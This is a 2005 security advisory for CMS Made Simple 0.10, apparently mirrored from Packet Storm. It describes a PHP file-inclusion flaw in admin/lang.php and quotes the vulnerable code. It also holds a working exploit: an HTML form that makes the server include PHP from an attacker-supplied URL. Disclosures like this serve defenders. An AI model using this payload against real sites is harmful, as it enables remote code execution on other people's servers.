Lucene search
K

CMS010.txt

🗓️ 01 Sep 2005 00:00:00Reported by Filip GroszynskiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

PHP injection vulnerability in CMS Made Simple version 0.10 allows unauthorized language file inclusion.

Code
` -- == -- == -- == -- == -- == -- == -- == -- == -- == --  
Name: CMS Made Simple - PHP injection   
Version <= 0.10  
Homepage: http://www.cmsmadesimple.org/  
  
Author: Filip Groszynski (VXSfx)  
Date: 31 August 2005  
-- == -- == -- == -- == -- == -- == -- == -- == -- == --  
  
Background:  
  
CMS Made Simple is an easy to use content managment  
system for simple stable content site. Uses PHP, MySQL  
and Smarty templating system.  
  
--------------------------------------------------------  
  
Vulnerable code exist in ./admin/lang.php:  
  
<?php  
...  
$current_language = "en_US";  
#Only do language stuff for admin pages  
[!] if (isset($CMS_ADMIN_PAGE)) {  
...  
#Check to see if there is already a language in use...  
if (isset($_POST["change_cms_lang"])) {  
[!] $current_language = $_POST["change_cms_lang"];  
setcookie("cms_language", $_POST["change_cms_lang"]);  
} else if (isset($_COOKIE["cms_language"])) {  
$current_language = $_COOKIE["cms_language"];  
}  
else {  
...  
}  
  
#Ok, we have a language to load, let's load it already...  
if (isset($nls['file'][$current_language])) {  
foreach ($nls['file'][$current_language] as $onefile) {  
[!] include($onefile);  
}  
}  
...  
}  
...  
?>  
--------------------------------------------------------  
  
Exploit:  
  
example.html:  
<form action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>  
<input type=hidden name=change_cms_lang value=vx>  
<input type=submit name=test VALUE="do it">  
</form>  
EOF  
  
--------------------------------------------------------  
  
Contact:  
  
Author: Filip Groszynski (VXSfx)  
Location: Poland <Warsaw>  
Email: groszynskif <|> gmail <|> com  
  
-- == -- == -- == -- == -- == -- == -- == -- == -- == --  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation